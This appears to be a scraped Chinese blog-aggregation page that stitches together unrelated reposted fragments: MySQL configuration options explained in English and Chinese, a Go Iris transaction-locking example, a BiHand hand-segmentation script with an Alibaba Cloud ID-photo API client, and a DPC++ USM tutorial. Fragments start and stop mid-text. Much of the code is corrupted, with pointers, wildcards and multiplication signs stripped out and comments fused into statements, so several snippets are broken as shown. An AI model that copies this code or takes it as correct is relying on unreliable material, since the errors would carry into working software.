database语句中指定的lettercase存储在磁盘上,但是MySQL在查找时将它们转换为小写。名称比较不区分大小写。这只适用于不区分大小写的文件系统!InnoDB表名和视图名以小写存储,Value = 1。 NOTE: lower_case_table_names can only be configured when initializing the server. Changing the lower_case_table_names setting after the server is initialized is prohibited. lower_case_table_names=1 Secure File Priv. 权限安全文件 secure-file-priv="C:/ProgramData/MySQL/MySQL Server 8.0/Uploads" The maximum amount of concurrent sessions the MySQL server will allow. One of these connections will be reserved for a user with SUPER privileges to allow the administrator to login even if the connection limit has been reached. MySQL服务器允许的最大并发会话量。这些连接中的一个将保留给具有超级特权的用户,以便允许管理员登录,即使已经达到连接限制。 max_connections=151 The number of open tables for all threads. Increasing this value increases the number of file descriptors that mysqld requires. Therefore you have to make sure to set the amount of open files allowed to at least 4096 in the variable "open-files-limit" in 为所有线程打开的表的数量。增加这个值会增加mysqld需要的文件描述符的数量。因此,您必须确保在[mysqld_safe]节中的变量“open-files-limit”中将允许打开的文件数量至少设置为4096 section [mysqld_safe] table_open_cache=2000 Maximum size for internal (in-memory) temporary tables. If a table grows larger than this value, it is automatically converted to disk based table This limitation is for a single table. There can be many of them. 
内部(内存)临时表的最大大小。如果一个表比这个值大,那么它将自动转换为基于磁盘的表。可以有很多。 tmp_table_size=94M How many threads we should keep in a cache for reuse. When a client disconnects, the client's threads are put in the cache if there aren't more than thread_cache_size threads from before. This greatly reduces the amount of thread creations needed if you have a lot of new connections. (Normally this doesn't give a notable performance improvement if you have a good thread implementation.) 我们应该在缓存中保留多少线程以供重用。当客户机断开连接时,如果之前的线程数不超过thread_cache_size,则将客户机的线程放入缓存。如果您有很多新连接,这将大大减少所需的线程创建量(通常,如果您有一个良好的线程实现,这不会带来显著的性能改进)。 thread_cache_size=10 MyISAM Specific options The maximum size of the temporary file MySQL is allowed to use while recreating the index (during REPAIR, ALTER TABLE or LOAD DATA INFILE. If the file-size would be bigger than this, the index will be created through the key cache (which is slower). MySQL允许在重新创建索引时(在修复、修改表或加载数据时)使用临时文件的最大大小。如果文件大小大于这个值,那么索引将通过键缓存创建(这比较慢)。 myisam_max_sort_file_size=100G If the temporary file used for fast index creation would be bigger than using the key cache by the amount specified here, then prefer the key cache method. This is mainly used to force long character keys in large tables to use the slower key cache method to create the index. myisam_sort_buffer_size=179M Size of the Key Buffer, used to cache index blocks for MyISAM tables. Do not set it larger than 30% of your available memory, as some memory is also required by the OS to cache rows. Even if you're not using MyISAM tables, you should still set it to 8-64M as it will also be used for internal temporary disk tables. 如果用于快速创建索引的临时文件比这里指定的使用键缓存的文件大,则首选键缓存方法。这主要用于强制大型表中的长字符键使用较慢的键缓存方法来创建索引。 key_buffer_size=8M Size of the buffer used for doing full table scans of MyISAM tables. Allocated per thread, if a full scan is needed. 用于对MyISAM表执行全表扫描的缓冲区的大小。如果需要完整的扫描,则为每个线程分配。 read_buffer_size=256K read_rnd_buffer_size=512K INNODB Specific options INNODB特定选项 innodb_data_home_dir= Use this option if you have a MySQL server with InnoDB support enabled but you do not plan to use it. This will save memory and disk space and speed up some things. 如果您启用了一个支持InnoDB的MySQL服务器,但是您不打算使用它,那么可以使用这个选项。这将节省内存和磁盘空间,并加快一些事情。skip-innodb skip-innodb If set to 1, InnoDB will flush (fsync) the transaction logs to the disk at each commit, which offers full ACID behavior. If you are willing to compromise this safety, and you are running small transactions, you may set this to 0 or 2 to reduce disk I/O to the logs. Value 0 means that the log is only written to the log file and the log file flushed to disk approximately once per second. Value 2 means the log is written to the log file at each commit, but the log file is only flushed to disk approximately once per second. 如果设置为1,InnoDB将在每次提交时将事务日志刷新(fsync)到磁盘,这将提供完整的ACID行为。如果您愿意牺牲这种安全性,并且正在运行小型事务,您可以将其设置为0或2,以将磁盘I/O减少到日志。值0表示日志仅写入日志文件,日志文件大约每秒刷新一次磁盘。值2表示日志在每次提交时写入日志文件,但是日志文件大约每秒只刷新一次磁盘。 innodb_flush_log_at_trx_commit=1 The size of the buffer InnoDB uses for buffering log data. As soon as it is full, InnoDB will have to flush it to disk. As it is flushed once per second anyway, it does not make sense to have it very large (even with long transactions).InnoDB用于缓冲日志数据的缓冲区大小。一旦它满了,InnoDB就必须将它刷新到磁盘。由于它无论如何每秒刷新一次,所以将它设置为非常大的值是没有意义的(即使是长事务)。 innodb_log_buffer_size=5M InnoDB, unlike MyISAM, uses a buffer pool to cache both indexes and row data. The bigger you set this the less disk I/O is needed to access data in tables. 
On a dedicated database server you may set this parameter up to 80% of the machine physical memory size. Do not set it too large, though, because competition of the physical memory may cause paging in the operating system. Note that on 32bit systems you might be limited to 2-3.5G of user level memory per process, so do not set it too high. 与MyISAM不同,InnoDB使用缓冲池来缓存索引和行数据。设置的值越大,访问表中的数据所需的磁盘I/O就越少。在专用数据库服务器上,可以将该参数设置为机器物理内存大小的80%。但是,不要将它设置得太大,因为物理内存的竞争可能会导致操作系统中的分页。注意,在32位系统上,每个进程的用户级内存可能被限制在2-3.5G,所以不要设置得太高。 innodb_buffer_pool_size=20M Size of each log file in a log group. You should set the combined size of log files to about 25%-100% of your buffer pool size to avoid unneeded buffer pool flush activity on log file overwrite. However, note that a larger logfile size will increase the time needed for the recovery process. 日志组中每个日志文件的大小。您应该将日志文件的合并大小设置为缓冲池大小的25%-100%,以避免在覆盖日志文件时出现不必要的缓冲池刷新活动。但是,请注意,较大的日志文件大小将增加恢复过程所需的时间。 innodb_log_file_size=48M Number of threads allowed inside the InnoDB kernel. The optimal value depends highly on the application, hardware as well as the OS scheduler properties. A too high value may lead to thread thrashing. InnoDB内核中允许的线程数。最优值在很大程度上取决于应用程序、硬件以及OS调度程序属性。过高的值可能导致线程抖动。 innodb_thread_concurrency=9 The increment size (in MB) for extending the size of an auto-extend InnoDB system tablespace file when it becomes full. 增量大小(以MB为单位),用于在表空间满时扩展自动扩展的InnoDB系统表空间文件的大小。 innodb_autoextend_increment=128 The number of regions that the InnoDB buffer pool is divided into. For systems with buffer pools in the multi-gigabyte range, dividing the buffer pool into separate instances can improve concurrency, by reducing contention as different threads read and write to cached pages. InnoDB缓冲池划分的区域数。对于具有多gb缓冲池的系统,将缓冲池划分为单独的实例可以提高并发性,因为不同的线程对缓存页面的读写会减少争用。 innodb_buffer_pool_instances=8 Determines the number of threads that can enter InnoDB concurrently. 确定可以同时进入InnoDB的线程数 innodb_concurrency_tickets=5000 Specifies how long in milliseconds (ms) a block inserted into the old sublist must stay there after its first access before it can be moved to the new sublist. 指定插入到旧子列表中的块必须在第一次访问之后停留多长时间(毫秒),然后才能移动到新子列表。 innodb_old_blocks_time=1000 It specifies the maximum number of .ibd files that MySQL can keep open at one time. The minimum value is 10. 它指定MySQL一次可以打开的.ibd文件的最大数量。最小值是10。 innodb_open_files=300 When this variable is enabled, InnoDB updates statistics during metadata statements. 当启用此变量时,InnoDB会在元数据语句期间更新统计信息。 innodb_stats_on_metadata=0 When innodb_file_per_table is enabled (the default in 5.6.6 and higher), InnoDB stores the data and indexes for each newly created table in a separate .ibd file, rather than in the system tablespace. 当启用innodb_file_per_table(5.6.6或更高版本的默认值)时,InnoDB将每个新创建的表的数据和索引存储在单独的.ibd文件中,而不是系统表空间中。 innodb_file_per_table=1 Use the following list of values: 0 for crc32, 1 for strict_crc32, 2 for innodb, 3 for strict_innodb, 4 for none, 5 for strict_none. 使用以下值列表:0表示crc32, 1表示strict_crc32, 2表示innodb, 3表示strict_innodb, 4表示none, 5表示strict_none。 innodb_checksum_algorithm=0 The number of outstanding connection requests MySQL can have. This option is useful when the main MySQL thread gets many connection requests in a very short time. It then takes some time (although very little) for the main thread to check the connection and start a new thread. The back_log value indicates how many requests can be stacked during this short time before MySQL momentarily stops answering new requests. 
You need to increase this only if you expect a large number of connections in a short period of time. MySQL可以有多少未完成连接请求。当MySQL主线程在很短的时间内收到许多连接请求时,这个选项非常有用。然后,主线程需要一些时间(尽管很少)来检查连接并启动一个新线程。back_log值表示在MySQL暂时停止响应新请求之前的短时间内可以堆多少个请求。只有当您预期在短时间内会有大量连接时,才需要增加这个值。 back_log=80 If this is set to a nonzero value, all tables are closed every flush_time seconds to free up resources and synchronize unflushed data to disk. This option is best used only on systems with minimal resources. 如果将该值设置为非零值,则每隔flush_time秒关闭所有表,以释放资源并将未刷新的数据同步到磁盘。这个选项最好只在资源最少的系统上使用。 flush_time=0 The minimum size of the buffer that is used for plain index scans, range index scans, and joins that do not use 用于普通索引扫描、范围索引扫描和不使用索引执行全表扫描的连接的缓冲区的最小大小。 indexes and thus perform full table scans. join_buffer_size=200M The maximum size of one packet or any generated or intermediate string, or any parameter sent by the mysql_stmt_send_long_data() C API function. 由mysql_stmt_send_long_data() C API函数发送的一个包或任何生成的或中间字符串或任何参数的最大大小 max_allowed_packet=500M If more than this many successive connection requests from a host are interrupted without a successful connection, the server blocks that host from performing further connections. 如果在没有成功连接的情况下中断了来自主机的多个连续连接请求,则服务器将阻止主机执行进一步的连接。 max_connect_errors=100 Changes the number of file descriptors available to mysqld. You should try increasing the value of this option if mysqld gives you the error "Too many open files". 更改mysqld可用的文件描述符的数量。如果mysqld给您的错误是“打开的文件太多”,您应该尝试增加这个选项的值。 open_files_limit=4161 If you see many sort_merge_passes per second in SHOW GLOBAL STATUS output, you can consider increasing the sort_buffer_size value to speed up ORDER BY or GROUP BY operations that cannot be improved with query optimization or improved indexing. 如果在SHOW GLOBAL STATUS输出中每秒看到许多sort_merge_passes,可以考虑增加sort_buffer_size值,以加快ORDER BY或GROUP BY操作的速度,这些操作无法通过查询优化或改进索引来改进。 sort_buffer_size=1M The number of table definitions (from .frm files) that can be stored in the definition cache. If you use a large number of tables, you can create a large table definition cache to speed up opening of tables. The table definition cache takes less space and does not use file descriptors, unlike the normal table cache. The minimum and default values are both 400. 可以存储在定义缓存中的表定义的数量(来自.frm文件)。如果使用大量表,可以创建一个大型表定义缓存来加速表的打开。与普通的表缓存不同,表定义缓存占用更少的空间,并且不使用文件描述符。最小值和默认值都是400。 table_definition_cache=1400 Specify the maximum size of a row-based binary log event, in bytes. Rows are grouped into events smaller than this size if possible. The value should be a multiple of 256. 指定基于行的二进制日志事件的最大大小,单位为字节。如果可能,将行分组为小于此大小的事件。这个值应该是256的倍数。 binlog_row_event_max_size=8K If the value of this variable is greater than 0, a replication slave synchronizes its master.info file to disk. (using fdatasync()) after every sync_master_info events. 如果该变量的值大于0,则复制奴隶将其主.info文件同步到磁盘。(在每个sync_master_info事件之后使用fdatasync())。 sync_master_info=10000 If the value of this variable is greater than 0, the MySQL server synchronizes its relay log to disk. (using fdatasync()) after every sync_relay_log writes to the relay log. 如果这个变量的值大于0,MySQL服务器将其中继日志同步到磁盘。(在每个sync_relay_log写入到中继日志之后使用fdatasync())。 sync_relay_log=10000 If the value of this variable is greater than 0, a replication slave synchronizes its relay-log.info file to disk. (using fdatasync()) after every sync_relay_log_info transactions. 如果该变量的值大于0,则复制奴隶将其中继日志.info文件同步到磁盘。(在每个sync_relay_log_info事务之后使用fdatasync())。 sync_relay_log_info=10000 Load mysql plugins at start."plugin_x ; plugin_y". 
开始时加载mysql插件。"plugin_x;plugin_y"
plugin_load
The TCP/IP Port the MySQL Server X Protocol will listen on. MySQL服务器X协议将监听TCP/IP端口。
loose_mysqlx_port=33060
原文链接:https://blog.csdn.net/mywpython/article/details/89499852
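To confirm which of the values above the running server actually applied — a generic verification step, not part of the original option file — query the server variables from any MySQL client:

-- Hedged example: check a few of the settings discussed above.
SHOW VARIABLES LIKE 'lower_case_table_names';
SHOW VARIABLES LIKE 'max_connections';
SHOW VARIABLES LIKE 'innodb_buffer_pool_size';
-- A rising Sort_merge_passes counter suggests sort_buffer_size is too small:
SHOW GLOBAL STATUS LIKE 'Sort_merge_passes';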
2023-10-08 09:56:02
129
转载
Go Iris
...lation": "READ-COMMITTED", // 这里设置为读提交,你可以根据需求调整 } // 创建数据库连接池 db, err := sql.Open("mysql", config.FormatDSN()) if err != nil { panic(err) } // 使用数据库连接池 app.Use(func(ctx iris.Context) { ctx.Values().Set("db", db) ctx.Next() }) // 定义路由 app.Get("/", func(ctx iris.Context) { db := ctx.Values().Get("db").(sql.DB) // 开始事务 tx, err := db.Begin() if err != nil { ctx.StatusCode(iris.StatusInternalServerError) ctx.WriteString("Error starting transaction") return } defer tx.Rollback() // 执行查询 stmt, err := tx.Prepare("SELECT FROM users WHERE id = ? FOR UPDATE") if err != nil { ctx.StatusCode(iris.StatusInternalServerError) ctx.WriteString("Error preparing statement") return } defer stmt.Close() var user User err = stmt.QueryRow(1).Scan(&user.ID, &user.Name, &user.Email) if err != nil { ctx.StatusCode(iris.StatusInternalServerError) ctx.WriteString("Error executing query") return } // 更新数据 _, err = tx.Exec("UPDATE users SET name = ? WHERE id = ?", "New Name", user.ID) if err != nil { ctx.StatusCode(iris.StatusInternalServerError) ctx.WriteString("Error updating data") return } // 提交事务 err = tx.Commit() if err != nil { ctx.StatusCode(iris.StatusInternalServerError) ctx.WriteString("Error committing transaction") return } ctx.WriteString("Data updated successfully!") }) // 启动服务器 app.Run(iris.Addr(":8080")) } 5. 实际应用中的考虑 在实际应用中,我们需要根据具体的业务场景选择合适的锁类型。比如说,如果有好几个小伙伴得同时查看数据,又不想互相打扰,那我们就用共享锁来搞定。要是你想保证数据一致,防止同时有人乱改,那就得用排他锁了。 另外,要注意的是,过度使用锁可能会导致性能问题,因为锁会阻塞其他事务的执行。因此,在设计系统时,我们需要权衡数据一致性和性能之间的关系。 6. 结语 通过今天的讨论,希望大家对Iris框架中的数据库锁类型配置有了更深入的理解。虽然设置锁类型会让事情变得稍微复杂一点,但这样做真的能帮我们更好地应对多任务同时进行时可能出现的问题,确保系统稳稳当当的不掉链子。 最后,我想说的是,技术的学习是一个不断积累的过程。有时候,我们会觉得某些概念很难理解,但这都是正常的。只要我们保持好奇心和探索精神,总有一天会豁然开朗。希望你们能够持续学习,不断进步! 谢谢大家!
2025-02-23 16:37:04
75
追梦人
转载文章
...seedd代码: Copyright (c) Lixin YANG. All Rights Reserved.r"""Networks for heatmap estimation from RGB images using Hourglass Network"Stacked Hourglass Networks for Human Pose Estimation", Alejandro Newell, Kaiyu Yang, Jia Deng, ECCV 2016"""import numpy as npimport torchimport torch.nn as nnimport torch.nn.functional as Ffrom skimage import io,transform,utilfrom termcolor import colored, cprintfrom bihand.models.bases.bottleneck import BottleneckBlockfrom bihand.models.bases.hourglass import HourglassBisectedimport bihand.utils.func as funcimport matplotlib.pyplot as pltfrom bihand.utils import miscimport matplotlib.cm as cmdef color_mask(output_ok): 颜色映射cmap = plt.cm.get_cmap('jet') 将张量转换为numpy数组mask_array = output_ok.detach().numpy() 创建彩色图像cmap = cm.get_cmap('jet')colored_mask = cmap(mask_array)return colored_mask 可视化 plt.imshow(colored_mask, cmap='jet') plt.axis('off') plt.show()def two_color(mask_tensor): 将张量转换为numpy数组mask_array = mask_tensor.detach().numpy() 将0到1之间的值转换为二值化掩码threshold = 0.5 阈值,大于阈值的为白色,小于等于阈值的为黑色binary_mask = np.where(mask_array > threshold, 1, 0)return binary_mask 可视化 plt.imshow(binary_mask, cmap='gray') plt.axis('off') plt.show()class SeedNet(nn.Module):def __init__(self,nstacks=2,nblocks=1,njoints=21,block=BottleneckBlock,):super(SeedNet, self).__init__()self.njoints = njointsself.nstacks = nstacksself.in_planes = 64self.conv1 = nn.Conv2d(3, self.in_planes, kernel_size=7, stride=2, padding=3, bias=True)self.bn1 = nn.BatchNorm2d(self.in_planes)self.relu = nn.ReLU(inplace=True)self.maxpool = nn.MaxPool2d(2, stride=2)self.layer1 = self._make_residual(block, nblocks, self.in_planes, 2self.in_planes) current self.in_planes is 64 2 = 128self.layer2 = self._make_residual(block, nblocks, self.in_planes, 2self.in_planes) current self.in_planes is 128 2 = 256self.layer3 = self._make_residual(block, nblocks, self.in_planes, self.in_planes)ch = self.in_planes 256hg2b, res1, res2, fc1, _fc1, fc2, _fc2= [],[],[],[],[],[],[]hm, _hm, mask, _mask = [], [], [], []for i in range(nstacks): 2hg2b.append(HourglassBisected(block, nblocks, ch, depth=4))res1.append(self._make_residual(block, nblocks, ch, ch))res2.append(self._make_residual(block, nblocks, ch, ch))fc1.append(self._make_fc(ch, ch))fc2.append(self._make_fc(ch, ch))hm.append(nn.Conv2d(ch, njoints, kernel_size=1, bias=True))mask.append(nn.Conv2d(ch, 1, kernel_size=1, bias=True))if i < nstacks-1:_fc1.append(nn.Conv2d(ch, ch, kernel_size=1, bias=False))_fc2.append(nn.Conv2d(ch, ch, kernel_size=1, bias=False))_hm.append(nn.Conv2d(njoints, ch, kernel_size=1, bias=False))_mask.append(nn.Conv2d(1, ch, kernel_size=1, bias=False))self.hg2b = nn.ModuleList(hg2b) hgs: hourglass stackself.res1 = nn.ModuleList(res1)self.fc1 = nn.ModuleList(fc1)self._fc1 = nn.ModuleList(_fc1)self.res2 = nn.ModuleList(res2)self.fc2 = nn.ModuleList(fc2)self._fc2 = nn.ModuleList(_fc2)self.hm = nn.ModuleList(hm)self._hm = nn.ModuleList(_hm)self.mask = nn.ModuleList(mask)self._mask = nn.ModuleList(_mask)def _make_fc(self, in_planes, out_planes):bn = nn.BatchNorm2d(in_planes)conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)return nn.Sequential(conv, bn, self.relu)def _make_residual(self, block, nblocks, in_planes, out_planes):layers = []layers.append( block( in_planes, out_planes) )self.in_planes = out_planesfor i in range(1, nblocks):layers.append(block( self.in_planes, out_planes))return nn.Sequential(layers)def forward(self, x):l_hm, l_mask, l_enc = [], [], []x = self.conv1(x) x: (N,64,128,128)x = self.bn1(x)x = self.relu(x)x = self.layer1(x)x 
= self.maxpool(x) x: (N,128,64,64)x = self.layer2(x)x = self.layer3(x)for i in range(self.nstacks): 2y_1, y_2, _ = self.hg2b[i](x)y_1 = self.res1[i](y_1)y_1 = self.fc1[i](y_1)est_hm = self.hm[i](y_1)l_hm.append(est_hm)y_2 = self.res2[i](y_2)y_2 = self.fc2[i](y_2)est_mask = self.mask[i](y_2)l_mask.append(est_mask)if i < self.nstacks-1:_fc1 = self._fc1[i](y_1)_hm = self._hm[i](est_hm)_fc2 = self._fc2[i](y_2)_mask = self._mask[i](est_mask)x = x + _fc1 + _fc2 + _hm + _maskl_enc.append(x)else:l_enc.append(x + y_1 + y_2)assert len(l_hm) == self.nstacksreturn l_hm, l_mask, l_encif __name__ == '__main__':a = torch.randn(10, 3, 256, 256) SeedNetmodel = SeedNet() output1,output2,output3 = SeedNetmodel(a) print(output1,output2,output3)total_params = sum(p.numel() for p in SeedNetmodel.parameters())/1000000print("Total parameters: ", total_params)pretrained_weights_path = 'E:/bihand/released_checkpoints/ckp_seednet_all.pth.tar'img_rgb_path=r"E:\FreiHAND\training\rgb\00000153.jpg"img=io.imread(img_rgb_path)resized_img = transform.resize(img, (256, 256), anti_aliasing=True)img256=util.img_as_ubyte(resized_img)plt.imshow(resized_img)plt.axis('off') 关闭坐标轴plt.show()''' implicit HWC -> CHW, 255 -> 1 '''img1 = func.to_tensor(img256).float() 转换为张量并且进行标准化处理''' 0-mean, 1 std, [0,1] -> [-0.5, 0.5] '''img2 = func.normalize(img1, [0.5, 0.5, 0.5], [1, 1, 1])img3 = torch.unsqueeze(img2, 0)ok=img3print(img.shape)SeedNetmodel = SeedNet()misc.load_checkpoint(SeedNetmodel, pretrained_weights_path)加载权重output1, output2, output3 = SeedNetmodel(img3)mask_tensor = torch.rand(1, 64, 64)output=output2[1] 1,1,64,64output_1=output[0] 1,64,64output_ok=torch.sigmoid(output_1[0])output_real=output_1[0].detach().numpy()直接产生的张量图color_mask=color_mask(output_ok) 显示彩色分割图two_color=two_color(output_ok)显示黑白分割图see=output_ok.detach().numpy() 使用Matplotlib库显示分割掩码 plt.imshow(see, cmap='gray') plt.axis('off') plt.show() print(output1, output2, output3)images = [resized_img, color_mask, two_color,output_real,see,see]rows = 1cols = 4 创建子图并展示图像fig, axes = plt.subplots(1, 6, figsize=(30, 5)) 遍历图像列表,并在每个子图中显示图像for i, image in enumerate(images):ax = axes[i] if cols > 1 else axes 如果只有一列,则直接使用axesif i ==5:ax.imshow(image, cmap='gray')else:ax.imshow(image)ax.imshowax.axis('off') 调整子图之间的间距plt.subplots_adjust(wspace=0.1, hspace=0.1) 展示图像plt.show() 上述的代码文件是在bihand/models/net_seed.py中,全部代码链接在https://github.com/lixiny/bihand。 把bihand/models/net_seed.p中的代码修改为我提供的代码即可使用作者训练好的模型和进行各种可视化。(预训练模型根据作者代码提示下载) 3.调用阿里云API进行证件照生成实例 3.1 准备工作 1.找到接口 进入下面链接即可快速访问 link 2.购买试用包 3.查看APPcode 4.下载代码 5.参数说明 3.2 实验代码 !/usr/bin/python encoding: utf-8"""===========================证件照制作接口==========================="""import requestsimport jsonimport base64import hashlibclass Idphoto:def __init__(self, appcode, timeout=7):self.appcode = appcodeself.timeout = timeoutself.make_idphoto_url = 'https://idp2.market.alicloudapi.com/idphoto/make'self.headers = {'Authorization': 'APPCODE ' + appcode,}def get_md5_data(self, body):"""md5加密:param body_json::return:"""md5lib = hashlib.md5()md5lib.update(body.encode("utf-8"))body_md5 = md5lib.digest()body_md5 = base64.b64encode(body_md5)return body_md5def get_photo_base64(self, file_path):with open(file_path, 'rb') as fp:photo_base64 = base64.b64encode(fp.read())photo_base64 = photo_base64.decode('utf8')return photo_base64def aiseg_request(self, url, data, headers):resp = requests.post(url=url, data=data, headers=headers, timeout=self.timeout)res = {"status_code": resp.status_code}try:res["data"] = json.loads(resp.text)return resexcept Exception 
as e:
            print(e)

    def make_idphoto(self, file_path, bk, spec="2"):
        """证件照制作接口
        :param file_path:
        :param bk:
        :param spec:
        :return:
        """
        photo_base64 = self.get_photo_base64(file_path)
        body_json = {
            "photo": photo_base64,
            "bk": bk,
            "with_photo_key": 1,
            "spec": spec,
            "type": "jpg",
        }
        body = json.dumps(body_json)
        body_md5 = self.get_md5_data(body=body)
        self.headers.update({'Content-MD5': body_md5})
        data = self.aiseg_request(url=self.make_idphoto_url, data=body, headers=self.headers)
        return data

if __name__ == "__main__":
    file_path = "图片地址"
    idphoto = Idphoto(appcode="你的appcode")
    d = idphoto.make_idphoto(file_path, "red", "2")
    print(d)

3.3 Experimental results and analysis
[Figures omitted: the original photo, the ID photo generated on a red background, and the one generated on a blue background; a Shiba Inu photo was also tested and likewise yielded an ID photo (original and red-background result).]

References
1. BiHand: Recovering Hand Mesh with Multi-stage Bisected Hourglass Networks (BMVC 2020). Paper: https://arxiv.org/pdf/2008.05079.pdf

原文链接:https://blog.csdn.net/m0_37758063/article/details/131128967
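As a usage note — a hedged sketch in which the appcode and file name are placeholders rather than real values — a blue-background call of the wrapper above looks like this:

# Illustrative call of the Idphoto wrapper defined above; values are placeholders.
idphoto = Idphoto(appcode="YOUR_APPCODE")
result = idphoto.make_idphoto("portrait.jpg", bk="blue", spec="2")
print(result["status_code"])  # 200 on success
print(result["data"])         # inspect the returned JSON before relying on fields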
2023-07-11 23:36:51
131
转载
转载文章
...sor b(buf,read_only); 除此之外还可以将buf设置为局部变量,当系统超出buf生存期,buf被销毁,数据也将转移到主机中。 矢量相加源代码 根据上面的知识,这里展示了利用DPC++实现矢量相加的代码。 //第一行在jupyter中指明了该cpp文件的保存位置%%writefile lab/vector_add.cppinclude <CL/sycl.hpp>using namespace sycl;int main() {const int N = 256;// 初始化两个队列并打印std::vector<int> vector1(N, 10);std::cout<<"\nInput Vector1: "; for (int i = 0; i < N; i++) std::cout << vector1[i] << " ";std::vector<int> vector2(N, 20);std::cout<<"\nInput Vector2: "; for (int i = 0; i < N; i++) std::cout << vector2[i] << " ";// 创建缓存区buffer vector1_buffer(vector1);buffer vector2_buffer(vector2);// 提交矢量相加任务queue q;q.submit([&](handler &h) {// 为缓存区创建访问器accessor vector1_accessor (vector1_buffer,h);accessor vector2_accessor (vector2_buffer,h);h.parallel_for(range<1>(N), [=](id<1> index) {vector1_accessor[index] += vector2_accessor[index];});});// 创建主机访问器将设备中数据拷贝到主机当中host_accessor h_a(vector1_buffer,read_only);std::cout<<"\nOutput Values: ";for (int i = 0; i < N; i++) std::cout<< vector1[i] << " ";std::cout<<"\n";return 0;} 运行结果 统一共享内存 (Unified Shared Memory USM) 统一共享内存是一种基于指针的方法,是将CPU内存和GPU内存进行统一的虚拟化方法,对于C++来说,指针操作内存是很常规的方式,USM也可以最大限度的减少C++移植到DPC++的代价。 下图显示了非USM(左)和USM(右)的程序员开发视角。 类型 函数调用 说明 在主机上可访问 在设备上可访问 设备 malloc_device 在设备上分配(显式) 否 是 主机 malloc_host 在主机上分配(隐式) 是 是 共享 malloc_shared 分配可以在主机和设备之间迁移(隐式) 是 是 USM语法 初始化: int data = malloc_shared<int>(N, q); int data = static_cast<int >(malloc_shared(N sizeof(int), q)); 释放 free(data,q); 使用共享内存之后,程序将自动在主机和运算设备之间隐式移动数据。 数据依赖 使用USM时,要注意数据之间的依赖关系以及事件之间的依赖关系,如果两个线程同时修改同一个内存区,将产生不可预测的结果。 我们可以使用不同的选项管理数据依赖关系: 内核任务中的 wait() 使用 depends_on 方法 使用 in_queue 队列属性 wait() q.submit([&](handler &h) {h.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 2; });}).wait(); // <--- wait() will make sure that task is complete before continuingq.submit([&](handler &h) {h.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 3; });}); depends_on auto e = q.submit([&](handler &h) { // <--- e is event for kernel taskh.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 2; });});q.submit([&](handler &h) {h.depends_on(e); // <--- waits until event e is completeh.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 3; });}); in_order queue property queue q(property_list{property::queue::in_order()}); // <--- this will make sure all the task with q are executed sequentially 练习1:事件依赖 以下代码使用 USM,并有三个提交到设备的内核。每个内核修改相同的数据阵列。三个队列之间没有数据依赖关系 为每个队列提交添加 wait() 在第二个和第三个内核任务中实施 depends_on() 方法 使用 in_order 队列属性,而非常规队列: queue q{property::queue::in_order()}; %%writefile lab/usm_data.cppinclude <CL/sycl.hpp>using namespace sycl;static const int N = 256;int main() {queue q{property::queue::in_order()};//用队列限制执行顺序std::cout << "Device : " << q.get_device().get_info<info::device::name>() << "\n";int data = static_cast<int >(malloc_shared(N sizeof(int), q));for (int i = 0; i < N; i++) data[i] = 10;q.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 2; });q.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 3; });q.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 5; });q.wait();//wait阻塞进程for (int i = 0; i < N; i++) std::cout << data[i] << " ";std::cout << "\n";free(data, q);return 0;} 执行结果 练习2:事件依赖 以下代码使用 USM,并有三个提交到设备的内核。前两个内核修改了两个不同的内存对象,第三个内核对前两个内核具有依赖性。三个队列之间没有数据依赖关系 %%writefile lab/usm_data2.cppinclude <CL/sycl.hpp>using namespace sycl;static const int N = 1024;int main() {queue q;std::cout << "Device : " << q.get_device().get_info<info::device::name>() << "\n";//设备选择int data1 = malloc_shared<int>(N, q);int data2 = malloc_shared<int>(N, q);for (int i = 0; i < N; i++) {data1[i] = 10;data2[i] = 10;}auto e1 = 
q.parallel_for(range<1>(N), [=](id<1> i) { data1[i] += 2; });
auto e2 = q.parallel_for(range<1>(N), [=](id<1> i) { data2[i] += 3; }); // e1 and e2 refer to the two kernel events
q.parallel_for(range<1>(N), {e1, e2}, [=](id<1> i) { data1[i] += data2[i]; }).wait(); // depends on e1 and e2
for (int i = 0; i < N; i++) std::cout << data1[i] << " ";
std::cout << "\n";
free(data1, q);
free(data2, q);
return 0;
}

Run result (screenshot omitted)

USM lab
Initialize two vectors on the host with the values 25 and 49, allocate two vectors on the device, copy the host data to the device, compute the square roots of the original values in parallel on the device, then add data2_device into data1_device, copy the result back to the host, verify that every element of the sum equals 12, and free all allocations before the program exits.

%%writefile lab/usm_lab.cpp
#include <CL/sycl.hpp>
#include <cmath>
using namespace sycl;
static const int N = 1024;
int main() {
    queue q;
    std::cout << "Device : " << q.get_device().get_info<info::device::name>() << "\n";
    // initialize 2 arrays on host
    int *data1 = static_cast<int *>(malloc(N * sizeof(int)));
    int *data2 = static_cast<int *>(malloc(N * sizeof(int)));
    for (int i = 0; i < N; i++) {
        data1[i] = 25;
        data2[i] = 49;
    }
    // STEP 1 : Create USM device allocation for data1 and data2
    int *data1_device = static_cast<int *>(malloc_device(N * sizeof(int), q));
    int *data2_device = static_cast<int *>(malloc_device(N * sizeof(int), q));
    // STEP 2 : Copy data1 and data2 to USM device allocation
    q.memcpy(data1_device, data1, sizeof(int) * N).wait();
    q.memcpy(data2_device, data2, sizeof(int) * N).wait();
    // STEP 3 : Write kernel code to update data1 on device with sqrt of value
    auto e1 = q.parallel_for(range<1>(N), [=](id<1> i) { data1_device[i] = std::sqrt(25); });
    auto e2 = q.parallel_for(range<1>(N), [=](id<1> i) { data2_device[i] = std::sqrt(49); });
    // STEP 5 : Write kernel code to add data2 on device to data1
    q.parallel_for(range<1>(N), {e1, e2}, [=](id<1> i) { data1_device[i] += data2_device[i]; }).wait();
    // STEP 6 : Copy data1 on device to host
    q.memcpy(data1, data1_device, sizeof(int) * N).wait();
    q.memcpy(data2, data2_device, sizeof(int) * N).wait();
    // verify results
    int fail = 0;
    for (int i = 0; i < N; i++) if (data1[i] != 12) { fail = 1; break; }
    if (fail == 1) std::cout << " FAIL"; else std::cout << " PASS";
    std::cout << "\n";
    // STEP 7 : Free USM device allocations
    free(data1_device, q);
    free(data1);
    free(data2_device, q);
    free(data2);
    // STEP 8 : Add event based kernel dependency for the Steps 2 - 6
    return 0;
}

Run result (screenshot omitted)
原文链接:https://blog.csdn.net/MCKZX/article/details/127630566
